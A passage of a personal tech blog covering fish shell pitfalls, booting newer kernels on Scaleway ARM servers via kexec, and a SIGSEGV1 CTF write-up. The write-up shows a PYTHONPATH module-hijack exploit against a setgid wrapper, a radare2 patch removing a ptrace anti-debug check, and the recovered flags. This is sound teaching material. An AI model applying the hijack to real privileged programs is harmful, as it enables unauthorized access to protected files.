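# A child process that just prints one of the variables it received.
printer = [sys.executable, "-c", "import os; print(os.environ['LC_ALL'])"]
print(run_with_env(["LANG=C", "LC_ALL=C"], printer))
```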

Another big difference is command substitution: $(cmd) becomes (cmd) (and `cmd` isn't supported at all, but you shouldn't be using it anyway).

Pitfalls and limitations

When attempting to port some bash functions over to fish, I noticed other missing features:

there is no short &> or |& combined stderr/stdout redirection (issue)
there is no parameter expansion of variables (out of scope)
Process substitution only works for input, not output, with psub. For example diff <(sort file1) <(sort file2) in bash, becomes diff (sort file1 | psub) (sort file2 | psub) in fish. (issue for output)
there is no fc to edit the last command in your $EDITOR, but you can do that with UP, then Alt+E to edit the current line.
there is no history substitution (!! for example), use arrow keys, like you'd do in bash.

Good surprises

Pasting in fish works as it always should have: it does not execute commands, and wraps multiple lines properly. This invalidates pastejacking attacks for example.

History is managed transparently by fish: the ~/.local/share/fish/fish_history text file is using an internal fish format. It means searching through it is more efficient when history grows bigger. And fish supports merging the history from other fish sessions with a single history --merge command ! This means I'll never have to run exec bash in all my open sessions to do a history sync again !

Fish also imports bash history automatically on first run, but it might take a while if you have a big history (a few minutes for 50k lines on one of the machines).

Python3 venvs work as they should if you include activate.fish.

Getting started

Just try fish in browser; it follows the tutorial, and explains all the basic features !

Running latest kernels on ARM Scaleway servers

2018-12-21T00:00:00+01:00

Scaleway, a French cloud provider, has been renting baremetal ARM servers for a few years now, and virtual ARM64 servers more recently. They ship with a Scaleway-provided kernel and initrd, which aren't updated as often as I'd like. The latest ARMv7 (32 bits) kernel is 4.9.93, while the latest 4.9 LTS at the time of this writing is 4.9.146. 53 versions behind is a lot, so I've been looking at how to work around this.

A bad surprise

At the latest Golang Paris meetup, I did a livecoding introduction to autocert. Unfortunately, the demo at the end failed, despite the code being correct (it was still my fault, though). After digging through, it all pointed to something wrong on the server.

This server, a C1 ARM server from Scaleway, was one of the first ever (baremetal) ARM servers available at a cloud provider. Based on custom hardware with a Marvell ARMv7 SoC, it was also very cheap at launch, and is still one of the cheapest baremetal servers to rent out there. Since then, Packet has launched ARM64 servers based on the Cavium ThunderX (much more expensive, with 96 cores and 2 SoCs on board), and Scaleway followed suit with virtual servers based on the same platform (with 4 to 64 cores), and much more affordable.

The C1 server was updated regularly, in addition to unattended-upgrades being enabled. But what seemed odd was the old kernel version (4.5.7). Since I had provisioned it (more or less), it had been running the same kernel version, despite having been rebooted a few times. Which isn't really a good idea, at least for security reasons.

And it turned out, for at least one other reason as well: golang binaries, starting with Go 1.9, failed to initialize the crypto-rng using the getrandom syscall, blocking forever. Updating to a more recent kernel (4.9.93) fixed the issue. But the update process required using the Scaleway web interface or the API; the cli tool does not (AFAIK) support this operation. Sidenote: I know that in a cloud world I should just spin up a new server and redeploy to it. I'll get there once I'm comfortable enough that it can work with my apps :-)
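One way to check for this kind of situation from userspace is to call getrandom in non-blocking mode: instead of hanging, the call fails immediately if the kernel's random pool isn't ready yet. This is only a diagnostic sketch (Linux-only, Python 3.6+), not what the Go runtime does, and the helper name is made up:

```python
import os


def crng_ready() -> bool:
    """Return True if getrandom() can deliver bytes without blocking."""
    try:
        os.getrandom(1, os.GRND_NONBLOCK)
    except BlockingIOError:
        # The kernel's random pool is not initialized yet: a plain
        # (blocking) getrandom() call would hang at this point.
        return False
    return True


print("getrandom would block" if not crng_ready() else "getrandom is ready")
```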

While this fixed this particular issue, it got me thinking about the general process for managing these servers. Should I set up a script or an ansible role to update the bootscript regularly ? Isn't there a better way, in order to use the distro kernels ? That led me to contemplate using kexec.

ARMv7 kexec attempts

Fortunately, I was not the first to have this idea, since Scaleway's initramfs scripts directly support using kexec to a new kernel ! You can find a tutorial here, but unfortunately, it only covers x86 servers.

I quickly learned that the serial console on the web interface is inferior to the one provided by the cli tool: ./scw attach <server-name>. All the boot logs from this post are captured with it.

My first attempts were therefore to use the KEXEC_KERNEL=/vmlinuz and KEXEC_INITRD=/initrd.img server tags, but it failed to work. Here is the boot log output with INITRD_VERBOSE=1:

** Message: /dev/nbd6 is not used[   30.528536] kexec_core: Starting new kernel

** Message: cm[   30.583224] Disabling non-boot CPUs ...
d check mode
** Message: /dev/n[   30.672735] CPU1: shutdown
bd7 is not used
** Message: cmd check mode
** Message: /dev/nbd8 is not used
[   30.791469] CPU2: shutdown
** Message: cmd check mode
** Message: /dev/nbd9 is not used
*[   30.891720] CPU3: shutdown
* Message: cmd check mode
** Message: /dev/nbd1[   30.960773] Bye!
0 is not used

The output is a bit mangled, and I lack visibility into how it's being done. So I wanted to add more kernel debug options: I tried using KEXEC_APPEND="debug initcall_debug". But then I discovered that the server tags did not support having spaces inside, since the tokenisation was space-based.
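To illustrate why a space-based tokenisation breaks such a value, here is a sketch comparing a naive split with a quote-aware one. How Scaleway actually stores and parses the tags isn't shown in this post, so the single tag string below is an assumption made for the example.

```python
import shlex

# Hypothetical representation of the server tags as one string.
tags = 'KEXEC_KERNEL=/vmlinuz KEXEC_APPEND="debug initcall_debug"'

naive = tags.split(" ")      # space-based tokenisation
quoted = shlex.split(tags)   # shell-like tokenisation that honours quotes

print(naive)
print(quoted)
```

With the naive split, the value is cut in two and `initcall_debug"` ends up as a separate, meaningless tag; the quote-aware split keeps `debug initcall_debug` together as the value of KEXEC_APPEND.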

I then decided to use INITRD_DROPBEAR=1 to start a shell in the initrd, giving me control over how the kexec is run. Initially, I was wondering if the fact that I didn't boot with a device tree was causing an issue. So I dumped the device-tree from the running process and re-built it with dtc. I made sure to re-use the command line from the current boot, and to properly detach the nbd block device. I attempted to use a more recent kexec userspace tool, and added a debugging option. After many attempts, I had a script to run inside the initramfs that looked like this:

#!/bin/sh

export PATH=/sbin/:/usr/sbin:$PATH

cp /newroot/initrd.img /
cp /newroot/vmlinuz /
cp /newroot/sbin/kexec /

/newroot/usr/bin/dtc -I fs -O dtb -o /generated-dtb /proc/device-tree/

umount /newroot
xnbd-client -c /dev/nbd0
xnbd-client -d /dev/nbd0

/kexec -d -l --append="verbose debug $(cat /proc/cmdline) is_in_kexec=yes root=/dev/nbd0 nbdroot=10.1.52.66,4448,nbd0" --dtb=/generated-dtb --ramdisk=/initrd.img  --type=zImage /vmlinuz
/kexec -d -e

Since the dropbear in initramfs lacks the scp server part, and kept generating new host keys on boot, I pushed it like this:

cat kexec-initramfs-script.sh | ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no root@myc1server "tee -a kexec.sh && chmod +x kexec.sh"

Then, it ran without any obvious error:

kernel: 0xb66ef008 kernel_size: 0x7d8200
MEMORY RANGES
0000000000000000-000000007fffefff (0)
zImage header: 0x016f2818 0x00000000 0x007d8200
zImage size 0x7d8200, file size 0x7d8200
zImage has tags
  offset 0x0000ae48 tag 0x5a534c4b size 8
kernel image size: 0x015c5d14
kexec_load: entry = 0x8000 flags = 0x280000
nr_segments = 3
segment[0].buf   = 0xb66ef008
segment[0].bufsz = 0x7d8200
segment[0].mem   = 0x8000
segment[0].memsz = 0x7d9000
segment[1].buf   = 0xb3603008
segment[1].bufsz = 0x30eba91
segment[1].mem   = 0x15ce000
segment[1].memsz = 0x30ec000
segment[2].buf   = 0x4f45a8
segment[2].bufsz = 0x45bc
segment[2].mem   = 0x46ba000
segment[2].memsz = 0x5000

But the serial console output was always the same:

[  129.248360] kexec_core: Starting new kernel
[  129.298586] Disabling non-boot CPUs ...
[  129.393572] CPU1: shutdown
[  129.532515] CPU2: shutdown
[  129.632399] CPU3: shutdown
[  129.700758] Bye!

And no new kernel seemed to boot… That's when I gave up, and decided to try something new. While writing this post, I also opened an issue to inform Scaleway of this status.

ARMv8 servers

I decided to check the ARMv8 virtual servers I had heard about. I already have arm64 experience, and I noticed that the pricing was similar (3€ per month for 4 cores + 2GB). So I instantiated one and tried to see if kexec could work on it. I first used the KEXEC_KERNEL and KEXEC_INITRD parameters, but it failed since there is no kexec in the arm64 initramfs:

>>> kexec: kernel=/vmlinuz initrd=/initrd.img append=''
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: xnbd-client: not found
/init: line 337: kexec: not found

It wasn't really an issue, since I had already resolved to use the rootfs' kexec tool previously (to have a more recent version), so I just enabled the INITRD_DROPBEAR ssh server, and ran a script on it. And it worked. Well, mostly: the kernel booted, but it couldn't mount the rootfs because it was looking for it in /dev/vda, which is the full block device, not the root partition: /dev/vda1. This is due to a bad parameter on the kernel command line; it doesn't affect Scaleway's initramfs because they do clever things.

After passing root=/dev/vda1, I finally had a working distro, with an up-to-date kernel.

Tutorial

After installing kexec-tools, I added the following /boot.sh script:

#!/bin/sh
if grep -q is_in_kexec=yes /proc/cmdline; then 
        exit 0
fi
kexec -f --ramdisk=/initrd.img --append="$(cat /proc/cmdline) is_in_kexec=yes root=/dev/vda1" /vmlinuz

I don't use systemctl kexec, because it goes back to the initramfs, and kexec does not exist there…
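The logic of the script is simple enough to spell out: a marker on the kernel command line tells whether we already went through kexec, and the new command line is the old one plus the marker and a corrected root= parameter. Here is a sketch of that logic in Python; it is a variation rather than a translation, since it drops the old root= value instead of appending a second one after it as the shell script does, and the sample command line is hypothetical.

```python
def already_kexeced(cmdline: str) -> bool:
    """True if the marker added before kexec is present on the command line."""
    return "is_in_kexec=yes" in cmdline.split()


def kexec_cmdline(cmdline: str, root: str = "/dev/vda1") -> str:
    """Build the command line for the kexec'ed kernel."""
    # Drop any existing root= parameter, then add the marker and the right root.
    kept = [arg for arg in cmdline.split() if not arg.startswith("root=")]
    return " ".join(kept + ["is_in_kexec=yes", f"root={root}"])


# Hypothetical first-boot command line, as read from /proc/cmdline.
first_boot = "console=ttyAMA0 root=/dev/vda ro"
second_boot = kexec_cmdline(first_boot)
print(second_boot)
print(already_kexeced(first_boot), already_kexeced(second_boot))
```

The marker is what prevents a kexec loop: on the second boot the check succeeds and the script exits without doing anything.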

And this systemd unit (to be improved, it starts very late, doesn't umount or stop services) kexec.service:

[Unit]
Description=Boot to kexec kernel if needed

[Service]
Type=oneshot
ExecStart=/boot.sh

[Install]
WantedBy=network.target basic.target

I then enabled it with systemctl enable kexec.service. That's all that's needed to always boot to the distribution's shipped kernel!

Bug notes

During my tests, I encountered many times IRQ exceptions on reboot; the VM is then broken, and needs api reboot; during the last tests to write this blog post, a reboot caused a permanent crash: even after using the API restart, the server was blocked in a transient state("rebooting server"), forbidding any other action. I hope a simple reboot in a VM can't crash the orchestrator or worse (hypervisor), affecting other clients. Update: after I contacted Scaleway support, they gave me be back access to the server: it was still rebooting endlessly and I was able to restart it with the API; I'm guessing the hypervisor didn't crash, and probably no other customers were affected.

Also during my explorations, I accidentally accessed the boot menu on the server (using a keyboard shortcut on the serial console). I don't think that's an issue, since it comes from the full EFI stack being emulated as well. It might be possible to configure the bootloader to directly boot the kernel I want, but I haven't explored this possibility. It might require the EFI bootloader to understand virtio block devices, which might be possible.

Conclusion

The boot time is quite slow with this solution, since I have to boot the system twice (56 seconds before kexec, about 31 seconds after). Once the root= and kexec in initramfs bugs are fixed, I can use the server tags and have a faster boot; otherwise I might publish an ansible role to automate this process.

I also decided to migrate my services to the ARMv8 server, since it performs much better: +50% to +1300% on sysbench; only the threads and hackbench message passing tests were slower, I'm guessing due to virtualization. It also has IPv6 available, if enabled.

Be careful though: these servers are often out of stock. I didn't notice at the time, but I was lucky that it was in stock when I provisioned mine: it no longer is in the Paris (par1) region, although it is still available in the Amsterdam (ams1) datacenter (with low stock though). There might be a trick to bypass the "out of stock" status, but I doubt this works reliably.

SIGSEGV1 qualification CTF

2018-10-12T00:00:00+02:00

After my r2con r2wars writeup, here's another writeup of a "challenge". This challenge is the Capture-The-Flag (CTF) pre-qualifications for the SIGSEGV1 conference in Paris. It felt a bit weird to have a conference registration limited to those who pass a certain challenge, but I was curious about what it would be like, so I thought: why not ?

Fun avec python

The first challenge was about python: one had to connect to a server and try to capture the "flag", a file which you don't have access to, by exploiting a vulnerability in code on the server. This is what it looks like:

chall@ae805fd9fe99:~$ ls -l
total 16
-r--r----- 1 root chall-pwned   42 Oct  5 17:00 flag
-rwxr-xr-x 1 root root         307 Sep 20 00:21 hello-world.py
-rwxr-sr-x 1 root chall-pwned 6304 Oct  5 17:05 wrapper

The flag file is the goal, but we can't read it with our permission level (chall user). The wrapper is a setgid binary (note the s in the group permissions: it runs with the chall-pwned group, which can read the flag) that just calls the hello-world.py script. This is the content of the script:

#!/usr/bin/python2.7

from colors import colors

def main():
    print('This is an advanced hello-world')
    print('The world is more joyful with colors')
    print('So, here we are:')
    print('{}Hello-World !{}'.format(colors.bcolors.OKBLUE, colors.bcolors.ENDC))

if __name__ == '__main__':
    main()

One issue is that when calling setuid or setgid binaries, you control the environment, and if it isn't cleared, you can control how the executables behave. Here, we are attacking the python script (it's the name of the challenge). The goal will be to use the import statement of the script to run our own code.

I reproduced the environment locally to do some tests, here is my test.py script:

#!/usr/bin/env python2
import colors

print("coucou")

And here is the colors.py I used:

#!/usr/bin/env python
print open("flag", "r").readline()

Running test.py on my machine shows that it's executing code in colors.py before doing anything, so it works. Now, I need to upload colors.py on the server, somewhere I can write files. Home isn't writable, so I just used /tmp. I put colors.py in /tmp/colors/. Then, I used the PYTHONPATH variable to run the script with the search path for modules modified:

chall@ae805fd9fe99:~$ PYTHONPATH=/tmp ./wrapper
sigsegv{518012356c8a2ed93b8d3e2416bb2274}

Traceback (most recent call last):
  File "/home/chall/hello-world.py", line 3, in <module>
    from colors import colors
ImportError: cannot import name colors

The rest of the script fails, but we can clearly see the flag: sigsegv{518012356c8a2ed93b8d3e2416bb2274}
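To make the mechanism easier to replay, here is a minimal sketch of the same import hijack, runnable locally with python3. The file names (victim.py, the temporary directories) and the printed messages are made up for the illustration; only the use of PYTHONPATH and a module named colors come from the challenge.

```python
import os
import subprocess
import sys
import tempfile

def run_with_hijacked_import() -> str:
    """Run a tiny victim script with PYTHONPATH pointing at an attacker directory."""
    with tempfile.TemporaryDirectory() as attacker_dir, \
         tempfile.TemporaryDirectory() as victim_dir:
        # Attacker-controlled module: its top-level code runs at import time.
        with open(os.path.join(attacker_dir, "colors.py"), "w") as f:
            f.write('print("code from the attacker module")\n')
        # Hypothetical victim script, standing in for hello-world.py.
        victim = os.path.join(victim_dir, "victim.py")
        with open(victim, "w") as f:
            f.write('import colors\nprint("victim continues")\n')
        # The caller controls the environment, hence the module search path.
        env = dict(os.environ, PYTHONPATH=attacker_dir)
        result = subprocess.run([sys.executable, victim], env=env,
                                capture_output=True, text=True, check=True)
        return result.stdout

output = run_with_hijacked_import()
print(output)
```

The attacker's line is printed before the victim's own output, because module-level code runs during the import. A wrapper that clears the environment before calling the interpreter, or that starts python with -E (ignore PYTHON* variables), would presumably close this hole.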

antistrings

This is a simple reverse engineering challenge, but with a few traps. I fell into all of them. The binary is backed up here if you want to see for yourself.

Despite the title being "antistrings", I still went ahead and looked at the strings:

$ r2 linux_x64_chall_v1.bin
 -- This is just an existentialist experiment.
[0x00400650]> iz
[Strings]
Num Vaddr      Paddr      Len Size Section  Type  String
000 0x00000b48 0x00400b48 147 148 (.rodata) ascii Strings won't help you that much.\n\n[+] Activating obfuscation layer 1...\n[+] Act]
001 0x00000bdc 0x00400bdc  12  13 (.rodata) ascii KIS\bJED@\rL]_
002 0x00000bed 0x00400bed   4   5 (.rodata) ascii \nBB^
003 0x00000bf2 0x00400bf2   8   9 (.rodata) ascii _YMCJ@];
004 0x00000c00 0x00400c00  15  16 (.rodata) ascii fIIO[K_YAO[Y^\@
005 0x00000c15 0x00400c15   4   5 (.rodata) ascii RZJX
006 0x00000c1a 0x00400c1a  13  14 (.rodata) ascii K($b%($!grdcA
007 0x00000c28 0x00400c28   9  10 (.rodata) ascii lHDG[XNOY
008 0x00000c32 0x00400c32   5   6 (.rodata) ascii F^AGG
009 0x00000c3d 0x00400c3d   5   6 (.rodata) ascii [\]TP
010 0x00000c48 0x00400c48  11  12 (.rodata) ascii ~\rz\b~OGOBCJ
011 0x00000c5b 0x00400c5b   4   5 (.rodata) ascii jm|v
012 0x00000c60 0x00400c60  10  11 (.rodata) ascii ^V^,-'-# L
013 0x00000c6b 0x00400c6b  10  11 (.rodata) ascii ~\rz\byFNM^K
014 0x00000c76 0x00400c76   5   6 (.rodata) ascii U_FVF
015 0x00000c80 0x00400c80   4   5 (.rodata) ascii \W]Z

So, the strings are encrypted. No big deal, I'll find out how later.

[0x00400650]> aaa
...snip...8<...
[0x00400650]> s main
[0x00400aa2]> pdf
┌ (fcn) main 19
│   main (int argc, char **argv, char **envp);
│           ; DATA XREF from entry0 (0x40066d)
│           0x00400aa2      4883ec08       sub rsp, 8
│           0x00400aa6      b800000000     mov eax, 0
│           0x00400aab      e830ffffff     call fcn.004009e0
│           0x00400ab0      4883c408       add rsp, 8
└           0x00400ab4      c3             ret

A short main() (I skipped the libc entry point here), going directly to another function.

[0x00400aa2]> s fcn.004009e0
[0x004009e0]> pdf 10
┌ (fcn) fcn.004009e0 16
│   fcn.004009e0 ();
│       ⁝   ; CALL XREF from main (0x400aab)
│       ⁝   0x004009e0      4883ec28       sub rsp, 0x28               ; '('
│       ⁝   0x004009e4      50             push rax
│       ⁝   0x004009e5      31c0           xor eax, eax
│       ⁝   0x004009e7      85c0           test eax, eax
│       ⁝   0x004009e9      58             pop rax
│      ┌──< 0x004009ea      7502           jne 0x4009ee
│     ┌───< 0x004009ec      7401           je 0x4009ef
│     │││   ; CODE XREF from fcn.004009e0 (0x4009ea)
└     │└└─< 0x004009ee      ebb9           jmp 0x4009a9                ; sub.BB_7c2+0x1e7

Here we can see the first trick: a jump to an unaligned address, after testing a very simple (always true) condition.

[0x004009e0]> s 0x4009ef
[0x004009ef]> pd 10
│           ; CODE XREF from fcn.004009e0 (0x4009ec)
│           0x004009ef      b900000000     mov ecx, 0
            0x004009f4      ba01000000     mov edx, 1
            0x004009f9      be00000000     mov esi, 0
            0x004009fe      bf00000000     mov edi, 0
            0x00400a03      b800000000     mov eax, 0
            0x00400a08      e823fcffff     call sym.imp.ptrace
            0x00400a0d      4885c0         test rax, rax
        ┌─< 0x00400a10      791e           jns 0x400a30

And here we have the first anti-debug: ptrace(PTRACE_TRACEME, 0, 1, 0) is called. The manpage says this is to "Indicate that this process is to be traced by its parent". In other words, this is used to detect if the process is currently being ptraced, which is the basic building block of all debuggers on Linux: the call fails when a tracer is already attached. When a debugger is detected this way, the program prints "not cool bro" and then exits.

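My first idea was to modify the binary (it doesn't seem to have any integrity verification built-in). We want to get rid of the ptrace() call while still taking the jns branch that follows; overwriting the call with a sub eax, 1 and two nops does that. eax, the return register in this x86 calling convention, was just set to 0, so it becomes 0xffffffff; since a 32-bit operation clears the upper half of rax, the 64-bit test rax, rax sees a positive value and the jns is taken. This is done with: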

[0x004009ef]> s 0x00400a08
[0x00400a08]> "wa sub eax, 1;nop;nop"

Don't forget to open the binary with r2 in write mode (-w command line switch). Afterwards, the code looks like this:

            0x004009ef      b900000000     mov ecx, 0
            0x004009f4      ba01000000     mov edx, 1
            0x004009f9      be00000000     mov esi, 0
            0x004009fe      bf00000000     mov edi, 0
            0x00400a03      b800000000     mov eax, 0
            0x00400a08      83e801         sub eax, 1
            0x00400a0b      90             nop
            0x00400a0c      90             nop
            0x00400a0d      4885c0         test rax, rax
        ┌─< 0x00400a10      791e           jns 0x400a30

No more ptrace()! This might be useful if I want to run the binary in a VM with gdb or strace. Let's continue on the execution path.
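For those who want to double-check the sign logic of the patched code, here is a small sketch that models the registers with plain integers. It assumes the usual x86-64 rules (a 32-bit write to eax zeroes the upper half of rax, and jns jumps when the sign bit of the tested value is clear); the helper name to_signed64 is mine.

```python
MASK32 = 0xFFFFFFFF
MASK64 = 0xFFFFFFFFFFFFFFFF

def to_signed64(value: int) -> int:
    """Interpret a 64-bit register value as a signed integer."""
    return value - (1 << 64) if value & (1 << 63) else value

# Patched path: "mov eax, 0" then "sub eax, 1"; the 32-bit result is zero-extended into rax.
rax_patched = (0 - 1) & MASK32
# Unpatched failure path: ptrace() returns -1 as a 64-bit long.
rax_failure = (-1) & MASK64

for name, rax in (("patched", rax_patched), ("ptrace failure", rax_failure)):
    taken = to_signed64(rax) >= 0  # jns jumps when the sign flag is clear
    print(f"{name}: rax={rax:#018x} jns taken={taken}")
```

So the patched binary always follows the same branch as a successful ptrace() call, whether or not a debugger is attached.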

[0x004009ef]> s 0x400a30
[0x00400a30]> pd 10
            ;-- rip:
            ; CODE XREF from fcn.004009e0 (+0x30)
            0x00400a30      bf480c4000     mov edi, str.z___OGOBCJ     ; 0x400c48 ; "~\rz\b~OGOBCJ\x10E]\x13@]S\x17jm|v\x1c^V^,-'-# L"
            0x00400a35      e80cfdffff     call sub.strlen_746
            0x00400a3a      4889c7         mov rdi, rax
            0x00400a3d      b800000000     mov eax, 0
            0x00400a42      e879fbffff     call sym.imp.printf         ; int printf(const char *format)

The first obfuscated string appears here. It is then passed to a function (that calls strlen()) that will transform it (decrypt?) before printing it. Let's see what this function looks like.

[0x00400a30]> pdf @sub.strlen_746
┌ (fcn) sub.strlen_746 124
│   sub.strlen_746 (char *arg1);
│           ; var char *s @ rsp+0x8
│           ; var void *local_10h @ rsp+0x10
│           ; var size_t size @ rsp+0x18
│           ; var int local_1ch @ rsp+0x1c
│           ; arg char *arg1 @ rdi
│           ; CALL XREFS from sub.BB_7c2 (0x4009a6, 0x4009c4)
│           ; CALL XREF from fcn.004009e0 (+0x3c)
│           ; CALL XREFS from rip (+0x5, +0x1c)
│           0x00400746      4883ec28       sub rsp, 0x28               ; '('
│           0x0040074a      48897c2408     mov qword [s], rdi          ; arg1
│           0x0040074f      488b442408     mov rax, qword [s]          ; [0x8:8]=-1 ; 8
│           0x00400754      4889c7         mov rdi, rax                ; const char *s
│           0x00400757      e854feffff     call sym.imp.strlen         ; size_t strlen(const char *s)
│           0x0040075c      89442418       mov dword [size], eax
│           0x00400760      8b442418       mov eax, dword [size]       ; [0x18:4]=-1 ; 24
│           0x00400764      4898           cdqe
│           0x00400766      4889c7         mov rdi, rax                ; size_t size
│           0x00400769      e8a2feffff     call sym.imp.malloc         ; void *malloc(size_t size)
│           0x0040076e      4889442410     mov qword [local_10h], rax
│           0x00400773      c744241c0000.  mov dword [local_1ch], 0
│       ┌─< 0x0040077b      eb31           jmp 0x4007ae
│       │   ; CODE XREF from sub.strlen_746 (0x4007b6)
│      ┌──> 0x0040077d      8b44241c       mov eax, dword [local_1ch]  ; [0x1c:4]=-1 ; 28
│      ⁝│   0x00400781      4863d0         movsxd rdx, eax
│      ⁝│   0x00400784      488b442410     mov rax, qword [local_10h]  ; [0x10:8]=-1 ; 16
│      ⁝│   0x00400789      4801d0         add rax, rdx                ; '('
│      ⁝│   0x0040078c      8b54241c       mov edx, dword [local_1ch]  ; [0x1c:4]=-1 ; 28
│      ⁝│   0x00400790      4863ca         movsxd rcx, edx
│      ⁝│   0x00400793      488b542408     mov rdx, qword [s]          ; [0x8:8]=-1 ; 8
│      ⁝│   0x00400798      4801ca         add rdx, rcx                ; '&'
│      ⁝│   0x0040079b      0fb612         movzx edx, byte [rdx]
│      ⁝│   0x0040079e      8b4c241c       mov ecx, dword [local_1ch]  ; [0x1c:4]=-1 ; 28
│      ⁝│   0x004007a2      83c125         add ecx, 0x25               ; '%'
│      ⁝│   0x004007a5      31ca           xor edx, ecx
│      ⁝│   0x004007a7      8810           mov byte [rax], dl
│      ⁝│   0x004007a9      8344241c01     add dword [local_1ch], 1
│      ⁝│   ; CODE XREF from sub.strlen_746 (0x40077b)
│      ⁝└─> 0x004007ae      8b44241c       mov eax, dword [local_1ch]  ; [0x1c:4]=-1 ; 28
│      ⁝    0x004007b2      3b442418       cmp eax, dword [size]       ; [0x18:4]=-1 ; 24
│      └──< 0x004007b6      7cc5           jl 0x40077d
│           0x004007b8      488b442410     mov rax, qword [local_10h]  ; [0x10:8]=-1 ; 16
│           0x004007bd      4883c428       add rsp, 0x28               ; '('
└           0x004007c1      c3             ret

Wow, that's a lot of code. Let's take some time to process this. The first part saves the size of the argument in local variable size, then allocates a second buffer of the same size.

The second part loops over both buffers, and stores each decoded character in the new buffer; the key is not constant, since the loop index is added to 0x25 before the XOR:

decoded[i] = a[i] ^ (i + 0x25)

It then returns the decoded string. I wrote a small python program to reproduce this:

#!/usr/bin/env python3
import sys
a = sys.stdin.read()
print("".join([chr(ord(a[i]) ^ (i+0x25)) for i in range(len(a)) ]) )
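The same transformation can also be checked offline, without r2, on strings copied from the iz listing. This is a sketch working on bytes rather than text (the function name decode and the sample variables are mine); it masks the key to 8 bits, which I assume mirrors the single-byte store (mov byte [rax], dl) in the assembly.

```python
def decode(data: bytes) -> bytes:
    """XOR byte i with (i + 0x25), keeping only the low 8 bits of the key."""
    return bytes(b ^ ((i + 0x25) & 0xFF) for i, b in enumerate(data))

# Entry 004 of the `iz` listing (the backslash is escaped for Python).
congrats = b"fIIO[K_YAO[Y^\\@"
# First 12 bytes of the string passed to open() in sub.BB_7c2.
path = b"\nBB^\x06_YMCJ@]"

print(decode(congrats).decode("ascii"))
print(decode(path).decode("ascii"))
```

Since XOR is its own inverse, calling decode() twice gives back the original bytes, so the same function could be used to craft new obfuscated strings.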

We can then use this from r2 to decode a random string:

[0x00400a30]> pr 48 @ str.fIIO_K_YAO_Y | ./decode.py

Congratulations! You have the flag :-)

Hum, this looks interesting. Let's rename the r2 string flag to remember this, it will be useful later to locate where this is printed:

[0x00400a30]> fr str.fIIO_K_YAO_Y "str.Congratulations! You have the flag :-)"

Let's continue where we left off: we wanted to decode, then print a string. Let's see what it was:

[0x00400a30]> pr 48 @ str.z___OGOBCJ |./decode.py

[+] Welcome to the RTFM challenge

Nice! This is the program's opening prompt. Let's continue with the next printed string:

[0x00400a42]> pr 48 @ str.z__yFNM_K |./decode.py

[+] Please enter the flag: @ACXG~
GHIBKLMV����ST

Once this is shown, we have the read() on stdin that asks for the flag:

            0x00400a6d      4889e0         mov rax, rsp
            0x00400a70      ba14000000     mov edx, 0x14               ; 20
            0x00400a75      4889c6         mov rsi, rax
            0x00400a78      bf00000000     mov edi, 0
            0x00400a7d      e85efbffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)

And then another unaligned jump trick to fool the reader, but reversed (eax != 0):

            0x00400a82      50             push rax
            0x00400a83      31c0           xor eax, eax
            0x00400a85      85c0           test eax, eax
            0x00400a87      58             pop rax
        ┌─< 0x00400a88      7502           jne 0x400a8c
       ┌──< 0x00400a8a      7401           je 0x400a8d
       ││   ; CODE XREF from rip (+0x58)
      ┌─└─> 0x00400a8c      eb48           jmp 0x400ad6

Followed by a function call:

[0x00400a42]> pd 10 @ 0x400a8c
            ; CODE XREF from rip (+0x58)
        ┌─< 0x00400a8c      eb48           jmp 0x400ad6
        │   0x00400a8e      89e0           mov eax, esp
        │   0x00400a90      4889c7         mov rdi, rax
        │   0x00400a93      e82afdffff     call sub.BB_7c2

In this function we'll see something curious:

[0x00400650]> s sub.BB_7c2
[0x004007c2]> pd 30
┌ (fcn) sub.BB_7c2 396
│   sub.BB_7c2 (int arg1);
│           ; var int local_8h @ rsp+0x8
│           ; var void *buf @ rsp+0x10
│           ; var unsigned int fildes @ rsp+0x28
│           ; var signed int local_2ch @ rsp+0x2c
│           ; arg int arg1 @ rdi
│           ; CALL XREF from fcn.004009e0 (+0xb3)
│           0x004007c2      4883ec38       sub rsp, 0x38               ; '8'
│           0x004007c6      48897c2408     mov qword [local_8h], rdi   ; arg1
│           0x004007cb      c744242c20a1.  mov dword [local_2ch], 0x7a120 ; [0x7a120:4]=-1
│       ┌─< 0x004007d3      eb47           jmp 0x40081c
│       │   ; CODE XREF from sub.BB_7c2 (0x400821)
│      ┌──> 0x004007d5      836c242c01     sub dword [local_2ch], 1
│      ⁝│   0x004007da      be00000000     mov esi, 0                  ; int oflag
│      ⁝│   0x004007df      bfed0b4000     mov edi, str.BB             ; 0x400bed ; "\nBB^\x06_YMCJ@];" ; const char *path
│      ⁝│   0x004007e4      b800000000     mov eax, 0
│      ⁝│   0x004007e9      e852feffff     call sym.imp.open           ; int open(const char *path, int oflag)
│      ⁝│   0x004007ee      89442428       mov dword [fildes], eax
│      ⁝│   0x004007f2      837c242800     cmp dword [fildes], 0
│     ┌───< 0x004007f7      7918           jns 0x400811
│     │⁝│   0x004007f9      488d4c2410     lea rcx, [buf]              ; 0x10 ; 16
│     │⁝│   0x004007fe      8b442428       mov eax, dword [fildes]     ; [0x28:4]=-1 ; '(' ; 40
│     │⁝│   0x00400802      ba0a000000     mov edx, 0xa                ; size_t nbyte
│     │⁝│   0x00400807      4889ce         mov rsi, rcx                ; void *buf
│     │⁝│   0x0040080a      89c7           mov edi, eax                ; int fildes
│     │⁝│   0x0040080c      e8cffdffff     call sym.imp.read           ; ssize_t read(int fildes, void *buf, size_t nbyte)
│     │⁝│   ; CODE XREF from sub.BB_7c2 (0x4007f7)
│     └───> 0x00400811      8b442428       mov eax, dword [fildes]     ; [0x28:4]=-1 ; '(' ; 40
│      ⁝│   0x00400815      89c7           mov edi, eax                ; int fildes
│      ⁝│   0x00400817      e8b4fdffff     call sym.imp.close          ; int close(int fildes)
│      ⁝│   ; CODE XREF from sub.BB_7c2 (0x4007d3)
│      ⁝└─> 0x0040081c      837c242c00     cmp dword [local_2ch], 0
│      └──< 0x00400821      7fb2           jg 0x4007d5

